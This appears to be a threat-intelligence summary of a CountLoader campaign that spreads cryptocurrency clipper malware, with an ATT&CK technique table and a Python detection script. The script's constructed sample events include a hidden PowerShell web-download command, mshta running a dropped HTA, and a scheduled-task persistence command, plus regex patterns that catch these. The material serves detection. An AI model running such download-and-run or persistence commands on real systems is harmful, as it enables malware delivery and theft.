EXECUTIVE SUMMARY
A large-scale threat campaign has been uncovered that leverages multiple layers of obfuscation and staged payload delivery to evade detection and maintain persistence on infected systems. The campaign, attributed to a sophisticated threat actor, targets organizations and individuals across various sectors, with a notable focus on Asia and the United States. The attackers' primary objective is to deploy cryptocurrency clipper malware, which hijacks clipboard activity and redirects cryptocurrency transactions to attacker-controlled addresses.
The malware infection process involves a complex chain of events, beginning with the execution of a malicious EXE file. This file launches a PowerShell command, which downloads and executes an obfuscated JavaScript loader known as CountLoader. The loader is executed using mshta.exe, a legitimate Windows utility often abused by malware to run scripts. Once executed, CountLoader performs several tasks, including establishing persistence, contacting multiple C2 servers, and attempting to spread via USB drives. The malware maintains control by creating scheduled tasks, using a custom encrypted communication protocol, and employing in-memory execution and security bypass techniques to evade detection.
This threat is significant for organizations due to its ability to evade detection and maintain persistence in infected systems. The campaign's use of multiple layers of obfuscation and staged payload delivery makes it challenging to detect and recover from. To mitigate this threat, organizations should prioritize patching, monitoring, and maintaining up-to-date endpoint protection. Regular backups and a robust incident response plan are also essential in case of a breach.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Defense Evasion | T1218.005 | System Binary Proxy Execution | Mshta |
| Persistence | T1053.005 | Scheduled Task/Job | Scheduled Task |
| Defense Evasion | T1562.001 | Impair Defenses | Disable or Modify Tools |
| Defense Evasion | T1027 | Obfuscated Files or Information | — |
| Lateral Movement | T1091 | Replication Through Removable Media | — |
| Collection | T1115 | Clipboard Data | — |
| Command and Control | T1573.001 | Encrypted Channel | Symmetric Cryptography |
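The execution-to-persistence chain described above (malicious EXE launching PowerShell, PowerShell launching mshta.exe, and a scheduled task re-launching the script host) maps directly to T1059.001, T1218.005 and T1053.005 in the table. The following is an added detection example written for this summary, not code from the referenced reports; the process-creation events, file paths and task name are constructed, and the rules only encode the parent/child and command-line relationships the summary describes.

```python
import re

# Constructed Sysmon-style process-creation events (illustrative, not from the report).
SAMPLE_EVENTS = [
    {"parent": r"C:\Users\victim\Downloads\invoice.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -nop -c "iwr http://example.invalid/a.hta -OutFile $env:TEMP\\a.hta"'},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\victim\AppData\Local\Temp\a.hta"},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /sc minute /mo 10 /tn "Updater" /tr "mshta.exe C:\Users\victim\AppData\Local\Temp\a.hta"'},
    {"parent": r"C:\Windows\explorer.exe",            # benign: user double-clicked a vendor HTA
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\help.hta"},
]

# Script interpreters that should rarely be the parent of mshta.exe on a workstation.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# PowerShell switches/cmdlets typical of a hidden download-and-run stage (T1059.001).
SUSPICIOUS_PS = re.compile(r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|\biwr\s|invoke-webrequest|downloadstring)", re.I)
# Scheduled-task action (/tr) that runs a script host (T1053.005 used for persistence).
TASK_PAYLOAD = re.compile(r"/tr\s+\"?[^\"]*(mshta|powershell|wscript|cscript)\.exe", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, independent of the host OS."""
    return re.split(r"[\\/]", path)[-1].lower()


def triage(events):
    """Return (event index, ATT&CK technique, reason) for each rule an event matches."""
    findings = []
    for i, ev in enumerate(events):
        parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
        if image == "powershell.exe" and SUSPICIOUS_PS.search(cmd):
            findings.append((i, "T1059.001", "PowerShell with hidden window, encoded command or web download"))
        if image == "mshta.exe" and parent in SCRIPT_HOSTS:
            findings.append((i, "T1218.005", f"mshta.exe launched by script host {parent}"))
        if image == "schtasks.exe" and "/create" in cmd.lower() and TASK_PAYLOAD.search(cmd):
            findings.append((i, "T1053.005", "scheduled task whose action is a script host"))
    return findings


if __name__ == "__main__":
    for idx, technique, reason in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {technique} - {reason}")
```

The benign fourth event (mshta.exe started from explorer.exe) produces no finding, so the rules key on the parent process and command line rather than on the presence of mshta.exe alone.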
REFERENCES:
The following reports contain further technical details:
https://securityonline.info/countloader-malware-etherhiding-cryptocurrency-clipper-mcafee/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/sinkholing-countloader-insights-into-its-recent-campaign/